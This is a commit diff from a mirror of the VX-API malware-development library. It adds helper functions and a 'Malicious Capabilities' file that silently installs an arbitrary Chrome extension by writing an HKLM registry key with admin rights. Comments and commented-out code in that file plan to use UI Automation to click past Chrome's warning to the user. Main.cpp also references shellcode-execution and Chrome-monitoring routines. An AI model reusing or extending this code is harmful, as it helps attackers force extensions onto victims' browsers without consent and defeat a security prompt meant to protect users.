Mirrors
/
vxug-VXAPI
mirror of https://github.com/vxunderground/VX-API
6
0
Fork 0
Code Issues Projects Releases Wiki Activity

2.0.388 

2.0.388
This commit is contained in:
vxunderground 2022-11-13 08:21:54 -06:00
parent fc578c6782
commit 597f618250
9 changed files with 278 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
README.md
View File

@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
# VX-API
Version: 2.0.379
Version: 2.0.388
Developer: smelly__vx
@ -113,6 +113,7 @@ You're free to use this in any manner you please. You do not need to use this en
| GetProcessBinaryNameFromHwndW | smelly__vx | Helper Functions |
| GetByteArrayFromFile | smelly__vx | Helper Functions |
| Ex_GetHandleOnDeviceHttpCommunication | x86matthew | Helper Functions |
| IsRegistryKeyValid | smelly__vx | Helper Functions |
| GetKUserSharedData | Geoff Chappell | Library Loading |
| GetModuleHandleEx2 | smelly__vx | Library Loading |
| GetPeb | 29a | Library Loading |
@ -147,6 +148,7 @@ You're free to use this in any manner you please. You do not need to use this en
| DnsGetDomainNameIPv4AddressAsString | smelly__vx | Networking |
| DnsGetDomainNameIPv4AddressUnsignedLong | smelly__vx | Networking |
| GetDomainNameFromUnsignedLongIPV4Address | smelly__vx | Networking |
| GetDomainNameFromIPV4AddressAsString | smelly__vx | Networking |
# Todo list

49
VX-API/GetDomainNameFromIPV4AddressAsString.cpp Normal file
View File

@ -0,0 +1,49 @@
#include "Win32Helper.h"
BOOL GetDomainNameFromIPV4AddressAsStringW(_In_ PWCHAR IpAddress, _Inout_ PWCHAR DomainName)
{
WSADATA WindowsSocketData = { 0 };
BOOL bFlag = FALSE;
SOCKADDR_IN AddressInformation = { 0 };
if (WSAStartup(MAKEWORD(2, 2), &WindowsSocketData) != ERROR_SUCCESS)
return FALSE;
AddressInformation.sin_family = AF_INET;
AddressInformation.sin_addr.S_un.S_addr = ConvertIPv4StringToUnsignedLongW(IpAddress);
if (GetNameInfoW((CONST SOCKADDR*) & AddressInformation, sizeof(SOCKADDR), DomainName, 32, NULL, 0, NI_NUMERICSERV) != ERROR_SUCCESS)
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
WSACleanup();
return bFlag;
}
BOOL GetDomainNameFromIPV4AddressAsStringA(_In_ PCHAR IpAddress, _Inout_ PCHAR DomainName)
{
WSADATA WindowsSocketData = { 0 };
BOOL bFlag = FALSE;
SOCKADDR_IN AddressInformation = { 0 };
if (WSAStartup(MAKEWORD(2, 2), &WindowsSocketData) != ERROR_SUCCESS)
return FALSE;
AddressInformation.sin_family = AF_INET;
AddressInformation.sin_addr.S_un.S_addr = ConvertIPv4StringToUnsignedLongA(IpAddress);
if (GetNameInfoA((CONST SOCKADDR*) & AddressInformation, sizeof(SOCKADDR), DomainName, 32, NULL, 0, NI_NUMERICSERV) != ERROR_SUCCESS)
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
WSACleanup();
return bFlag;
}

27
VX-API/IsRegistryKeyValid.cpp Normal file
View File

@ -0,0 +1,27 @@
#include "Win32Helper.h"
DWORD IsRegistryKeyValidW(_In_ HKEY PredefinedKey, _In_ PWCHAR Path)
{
HKEY hKey = NULL;
DWORD dwError = ERROR_SUCCESS;
dwError = RegOpenKeyExW(PredefinedKey, Path, 0, GENERIC_READ | GENERIC_WRITE, &hKey);
if (hKey)
RegCloseKey(hKey);
return dwError;
}
DWORD IsRegistryKeyValidA(_In_ HKEY PredefinedKey, _In_ PCHAR Path)
{
HKEY hKey = NULL;
DWORD dwError = ERROR_SUCCESS;
dwError = RegOpenKeyExA(PredefinedKey, Path, 0, GENERIC_READ | GENERIC_WRITE, &hKey);
if (hKey)
RegCloseKey(hKey);
return dwError;
}

4
VX-API/Main.cpp
View File

@ -34,8 +34,10 @@ int main(VOID)
Sei.Payload = GlobalOpenCalcPayload;
Sei.dwLengthOfPayloadInBytes = 277;
Sei.MethodEnum = E_DNSQUERYEX;
WCHAR IpBuffer[32] = { 0 };
//MpfSilentInstallGoogleChromePluginW((PWCHAR)L"aapbdbdomjkkjkaonfhkkikfgjllcleb");
MpfComMonitorChromeSessionOnce2();
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
return dwError;

4
VX-API/MpfComMonitorChromeSessionOnce.cpp
View File

@ -129,7 +129,6 @@ DWORD MpfComMonitorChromeSessionOnce(VOID)
IUIAutomationElementArray* Array = NULL;
EventHandler *EventHandlerObject = NULL;
EventHandlerObject = new EventHandler();
if (!EventHandlerObject)
return -1;
@ -201,7 +200,6 @@ DWORD MpfComMonitorChromeSessionOnce(VOID)
else
bHandlerPresent = TRUE;
for (;;) { Sleep(10); } //let event handler work
bFlag = TRUE;
@ -232,4 +230,4 @@ EXIT_ROUTINE:
CoUninitialize();
return dwError;
}
}

3
VX-API/VX-API.vcxproj
View File

@ -163,6 +163,7 @@
<ClCompile Include="GetCurrentProcessIdFromTeb.cpp" />
<ClCompile Include="GetCurrentUserSid.cpp" />
<ClCompile Include="GetCurrentWindowTextFromUserProcessParameter.cpp" />
<ClCompile Include="GetDomainNameFromIPV4AddressAsString.cpp" />
<ClCompile Include="GetDomainNameFromUnsignedLongIPV4Address.cpp" />
<ClCompile Include="GetFileSizeFromPath.cpp" />
<ClCompile Include="GetKUserSharedData.cpp" />
@ -214,6 +215,7 @@
<ClCompile Include="IsPathValid.cpp" />
<ClCompile Include="IsProcessRunning.cpp" />
<ClCompile Include="IsProcessRunningAsAdmin.cpp" />
<ClCompile Include="IsRegistryKeyValid.cpp" />
<ClCompile Include="Main.cpp" />
<ClCompile Include="ManualResourceDataFetching.cpp" />
<ClCompile Include="MasqueradePebAsExplorer.cpp" />
@ -224,6 +226,7 @@
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
<ClCompile Include="MpfSilentInstallGoogleChromePlugin.cpp" />
<ClCompile Include="SendIcmpEchoMessageToIPv4Host.cpp" />
<ClCompile Include="OleGetClipboardData.cpp" />
<ClCompile Include="RecursiveFindFile.cpp" />

44
VX-API/VX-API.vcxproj.filters
View File

@ -55,6 +55,9 @@
<Filter Include="Source Files\Windows API Helper Functions\Network Connectivity">
<UniqueIdentifier>{71e7ff3a-c576-49b0-96e2-0b4479a5fa5f}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions">
<UniqueIdentifier>{6be9adc7-8493-44a7-abce-3ec818469f70}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="Main.cpp">
@ -414,29 +417,38 @@
<ClCompile Include="SendIcmpEchoMessageToIPv4Host.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity</Filter>
</ClCompile>
<ClCompile Include="ConvertIPv4StringToUnsignedLong.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity</Filter>
</ClCompile>
<ClCompile Include="ConvertIPv4IpAddressStructureToString.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity</Filter>
</ClCompile>
<ClCompile Include="ConvertIPv4IpAddressUnsignedLongToString.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity</Filter>
</ClCompile>
<ClCompile Include="GetByteArrayFromFile.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="DnsGetDomainNameIPv4AddressAsString.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity</Filter>
</ClCompile>
<ClCompile Include="DnsGetDomainNameIPv4AddressUnsignedLong.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity</Filter>
</ClCompile>
<ClCompile Include="Ex_GetHandleOnDeviceHttpCommunication.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="ConvertIPv4IpAddressStructureToString.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions</Filter>
</ClCompile>
<ClCompile Include="ConvertIPv4IpAddressUnsignedLongToString.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions</Filter>
</ClCompile>
<ClCompile Include="ConvertIPv4StringToUnsignedLong.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions</Filter>
</ClCompile>
<ClCompile Include="DnsGetDomainNameIPv4AddressAsString.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions</Filter>
</ClCompile>
<ClCompile Include="DnsGetDomainNameIPv4AddressUnsignedLong.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions</Filter>
</ClCompile>
<ClCompile Include="GetDomainNameFromUnsignedLongIPV4Address.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity</Filter>
<Filter>Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions</Filter>
</ClCompile>
<ClCompile Include="GetDomainNameFromIPV4AddressAsString.cpp">
<Filter>Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions</Filter>
</ClCompile>
<ClCompile Include="MpfSilentInstallGoogleChromePlugin.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
</ClCompile>
<ClCompile Include="IsRegistryKeyValid.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>

8
VX-API/Win32Helper.h
View File

@ -203,7 +203,7 @@ BOOL GetProcessBinaryNameFromHwndA(_In_ HWND ProcessHwnd, _Inout_ PCHAR BinaryNa
BOOL GetByteArrayFromFileW(_Inout_ PBYTE Buffer, _In_ PWCHAR Path, _In_ ULONGLONG BytesToRead);
BOOL GetByteArrayFromFileA(_Inout_ PBYTE Buffer, _In_ PCHAR Path, _In_ ULONGLONG BytesToRead);
BOOL Ex_GetHandleOnDeviceHttpCommunication(_Out_ PHANDLE Handle);
DWORD IsRegistryKeyValidW(_In_ HKEY PredefinedKey, _In_ PWCHAR Path);
/*******************************************
@ -253,6 +253,8 @@ DWORD MpfGetLsaPidFromNamedPipe(VOID);
BOOL ShellcodeExecutionViaFunctionCallbackMain(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
DWORD MpfComMonitorChromeSessionOnce(VOID);
DWORD MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc(_In_ PBYTE BinaryImage);
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginW(_In_ PWCHAR ExtensionIdentifier);
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginA(_In_ PCHAR ExtensionIdentifier);
@ -310,4 +312,6 @@ DWORD DnsGetDomainNameIPv4AddressAsStringA(_In_ PCHAR DomainName, _Inout_ PCHAR
ULONG DnsGetDomainNameIPv4AddressUnsignedLongW(_In_ PWCHAR DomainName);
ULONG DnsGetDomainNameIPv4AddressUnsignedLongA(_In_ PCHAR DomainName);
BOOL GetDomainNameFromUnsignedLongIPV4AddressW(_In_ ULONG IpAddress, _Inout_ PWCHAR DomainName);
BOOL GetDomainNameFromUnsignedLongIPV4AddressA(_In_ ULONG IpAddress, _Inout_ PCHAR DomainName);
BOOL GetDomainNameFromUnsignedLongIPV4AddressA(_In_ ULONG IpAddress, _Inout_ PCHAR DomainName);
BOOL GetDomainNameFromIPV4AddressAsStringW(_In_ PWCHAR IpAddress, _Inout_ PWCHAR DomainName);
BOOL GetDomainNameFromIPV4AddressAsStringA(_In_ PCHAR IpAddress, _Inout_ PCHAR DomainName);

158
VX-API/__unstable__preview__MpfSilentInstallGoogleChromePlugin.cpp Normal file
View File

@ -0,0 +1,158 @@
#include "Win32Helper.h"
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginW(_In_ PWCHAR ExtensionIdentifier)
{
WCHAR RegistryKeyPath[MAX_PATH] = L"SOFTWARE\\WOW6432Node\\Google\\Chrome\\Extensions\\";
WCHAR UpdateUrl[MAX_PATH] = L"https://clients2.google.com/service/update2/crx";
BOOL bFlag = FALSE;
HKEY hKey = NULL;
DWORD dwError = ERROR_SUCCESS;
if (!IsProcessRunningAsAdmin()) //admin required
goto EXIT_ROUTINE;
if (StringConcatW(RegistryKeyPath, ExtensionIdentifier) == NULL)
goto EXIT_ROUTINE;
dwError = IsRegistryKeyValidW(HKEY_LOCAL_MACHINE, RegistryKeyPath);
if (dwError == ERROR_SUCCESS) //already installed
goto EXIT_ROUTINE;
if (dwError != ERROR_FILE_NOT_FOUND) //other error occurred
goto EXIT_ROUTINE;
dwError = ERROR_SUCCESS;
if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, RegistryKeyPath, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL) != ERROR_SUCCESS)
goto EXIT_ROUTINE;
if(RegSetValueExW(hKey, L"update_url", 0, REG_SZ, (PBYTE)UpdateUrl, StringLengthW(UpdateUrl) * sizeof(WCHAR)) != ERROR_SUCCESS)
goto EXIT_ROUTINE;
bFlag = TRUE;
// This code causes Chrome to display an error, it alerts the user
// that a new chrome extension has been silently installed. It
// asks the user whether or not they'd like to enable it, disable it,
// or remove it. The goal now is to use the IUIAutomation API to
// programmatically enable the plugin. The code bottom is borrowed
// from the other functionality present in MpfComMonitorChromeSessionOnce,
// which, although needs revision, is sufficient enough for this experimental
// code base. The code is currently commented out, but it is nearly
// complete. It successfully identifies the ERROR message thrown,
// it is able to SetFocus and find the text. All that remains is
// getting the POINT structure, filling it, automating a click, and then
// sending the ENTER command as SENDINPUT, to enable the script. This
// method is unorthodox, and may be prone to errors as it relies on the
// chrome being open at the time the extension is installed. Other methods
// need to be discovered to silently install extensions.
// An alternative method is Chrome native messaging, or reverse engineering
// chrome plugin DB files in %LOCALAPPDATA% to determine how to enable
// it without having to interface with chrome or the IUI
//
// -smelly, November 13th, 2022
/*
INCOMPLETE CODE BASE NEEDS TO BE INCLUDED
HWND hChrome = NULL;
DWORD dwError = ERROR_SUCCESS;
INT Length = 0;
BOOL bFlag = FALSE, bHandlerPresent = FALSE;
HRESULT Result = ERROR_SUCCESS;
IUIAutomation* Automaton = NULL;
IUIAutomationElement* Element = NULL;
IUIAutomationCondition* Condition = NULL;
IUIAutomationElementArray* Array = NULL;
EventHandler* EventHandlerObject = NULL;
EventHandlerObject = new EventHandler();
if (!EventHandlerObject)
return -1;
Result = CoInitializeEx(NULL, COINIT_MULTITHREADED);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
for (;;)
{
WCHAR Buffer[MAX_PATH * sizeof(WCHAR)] = { 0 };
if (!GetProcessBinaryNameFromHwndW(GetForegroundWindow(), Buffer, MAX_PATH * sizeof(WCHAR)))
continue;
if (StringFindSubstringW(Buffer, (PWCHAR)L"chrome.exe") != NULL)
break;
}
hChrome = FindWindowExW(NULL, hChrome, L"Chrome_WidgetWin_1", NULL);
if (hChrome == NULL)
goto EXIT_ROUTINE;
Result = CoCreateInstance(CLSID_CUIAutomation, NULL, CLSCTX_INPROC_SERVER, IID_PPV_ARGS(&Automaton));
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Automaton->ElementFromHandle(hChrome, &Element);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Automaton->CreatePropertyCondition(UIA_ControlTypePropertyId, CComVariant(UIA_ToolBarControlTypeId), &Condition);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Element->FindAll(TreeScope_Descendants, Condition, &Array);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Array->get_Length(&Length);
for (INT i = 0; i < Length; i++)
{
CComBSTR NameObject;
IUIAutomationElementArray* ccArray = NULL;
INT ccLength = 0;
Result = Array->GetElement(i, &EventHandlerObject->Pane);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Automaton->CreatePropertyCondition(UIA_ControlTypePropertyId, CComVariant(UIA_MenuItemControlTypeId), &Condition);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = EventHandlerObject->Pane->FindAll(TreeScope_Descendants, Condition, &ccArray);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
ccArray->get_Length(&ccLength);
for (INT y = 0; y < ccLength; y++)
{
CComBSTR ccNameObject;
Result = ccArray->GetElement(y, &EventHandlerObject->Pane);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
EventHandlerObject->Pane->get_CurrentName(&ccNameObject);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
if(StringCompareW(ccNameObject, L"Error") == ERROR_SUCCESS)
EventHandlerObject->Pane->SetFocus(); <------- ERROR MESSAGE IS HERE IN EVENTHANDLEROBJECT
}
return dwError;
*/
EXIT_ROUTINE:
if (hKey)
RegCloseKey(hKey);
return bFlag;
}
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginA(_In_ PCHAR ExtensionIdentifier)
{
return FALSE;
}